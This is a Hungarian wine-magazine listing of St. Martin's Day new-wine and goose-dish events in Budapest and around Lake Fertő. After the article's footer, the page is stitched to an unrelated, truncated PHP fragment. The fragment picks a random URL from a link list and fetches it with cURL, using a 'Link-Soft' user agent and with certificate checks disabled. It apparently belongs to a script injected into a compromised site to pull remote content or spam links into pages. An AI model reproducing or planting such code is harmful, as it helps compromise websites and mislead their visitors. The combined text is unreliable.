Márton-napi programajánló

Márton-nap hagyományosan az új bor és a libából készülő ételek ünnepe – nem csoda hát, hogy számos gasztronómiai program várja ilyenkor az ínyenc közönséget határon innen és túl. Ezek közül válogattunk. Szent Márton Napi Újborünnep a Bock Pincében A Bock Pince 15. alkalommal rendezi meg saját újborünnepét a Bock Hotelben november 10-én. A főszerep természetesen... View Article


Márton-nap hagyományosan az új bor és a libából készülő ételek ünnepe – nem csoda hát, hogy számos gasztronómiai program várja ilyenkor az ínyenc közönséget határon innen és túl. Ezek közül válogattunk.

Szent Márton Napi Újborünnep a Bock Pincében

A Bock Pince 15. alkalommal rendezi meg saját újborünnepét a Bock Hotelben november 10-én. A főszerep természetesen a libából készült ínyencségeké és Szent Márton boráé lesz, de a kiváló borok és ételek mellett izgalmas koncertek és új helyszínek is várják majd az érdeklődőket.

A mára hagyománnyá vált rendezvényen ezúttal a Magna Cum Laude, Gájer Bálint, St. Martin, a BorCanto, a Villányi Ifjúsági Fúvószenekar és az EXIT zenekar gondoskodik a vendégek szórakoztatásáról, akik kóstolón is részt vehetnek, ahol a Capella 2009 mellett az Artis Csokoládéműhely kézműves bonbonjait is megízlelhetik és megismerkedhetnek az Ikon Szappan és a Whirlpool újdonságaival. Az ünnepség során már előjegyezhető lesz a Bock Appétit című szakácskönyv, amely az idén 15 éves Bock Óbor Étterem legnépszerűbb fogásait tartalmazza és december elején kerül forgalomba.

További információ ide kattintva érhető el.

Márton-napi borkóstoló a Fertő tónál

A Fertő tó környékén mindig történik valami. Most éppen a Pannon Ősz programsorozat, amelynek csúcspontja a Márton-nap környékén a Fertő tavi bortermelő településeken megrendezett Martiniloben programsorozat. Ez annak a hagyománynak a folytatása, amely szerint a tó környéki borosgazdák november 11-én rendre megkóstolták és értékelték a borokat. Ha úgy ítélték meg, hogy már érett, akkor megkeresztelték, s így hivatalossá vált, hogy fogyasztható. Manapság már nemcsak a borosgazdák kóstolják meg Márton-nap tájékán a borokat, hanem a nagyközönség előtt is szélesre tárják a pinceajtókat. A jó borokhoz persze finom ételek is dukálnak! A Martiniloben ugyan Márton-naphoz kötődik, de nemcsak egy napig, hanem október végétől november közepéig tart.

November 9-11. között a burgenlandi borászat fővárosába, Gálosba (Gols) várják a borkedvelőket, ahol több mint nyolcvan pince fogadja majd a vendégeket. Kismartonban (Eisenstadt) pedig Márton-napi búcsút rendeznek november 11-én. A Martiniloben programsorozata november 17-18-án Mosontétényben (Tadten) a bornapokkal zárul.

További információ itt érhető el.

VIII. Márton Napi Borfesztivál

Nyolcadik alkalommal rendezik meg Danubius Hotel Gellért Márton-napi borfesztiválját, az idén 100. születésnapját ünneplő szálloda csodálatos épületében. A nyolcadik Márton napi Borfesztivál gasztro-programjai is a Gellért századik évfordulóját idézik: Száz év vagány butiksörfesztivállal indul a nulladik nap, ahol válogatott söröket kínálnak. A Százszorséf lakosztályétteremben ismét Michelin-csillagos séf, méghozzá Palágyi Eszter, készíti a prémium kategóriás menüt. A Száz százalék Gellért borvacsora séfjei kreativitásukkal és a fogásokhoz illő borokkal ünneplik a Gellért évszázados vendéglátását, és a Száz liba egy sorban Márton napi Sunday brunch felvonultatja a legkedveltebb libaételeket.

A híres szálloda termeiben bemutatkoznak Magyarország legkiválóbb borászatai, korlátlanul kóstolhatunk több száz féle bort és minőségi pálinkát. Lesz libastand, képviseltetik magukat Budapest válogatott gasztro helyei, és jobbnál jobb koncertek várják a szórakozni vágyókat a Gellért Fürdőcsarnokban., ahol pénteken fellép az Anna and the Barbies és szombaton a Maszkura és a Tücsökraj.

További információ ide kattintva érhető el.

(Visited 1 times, 1 visits today)

The post Márton-napi programajánló appeared first on VinCE Magazin.


html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>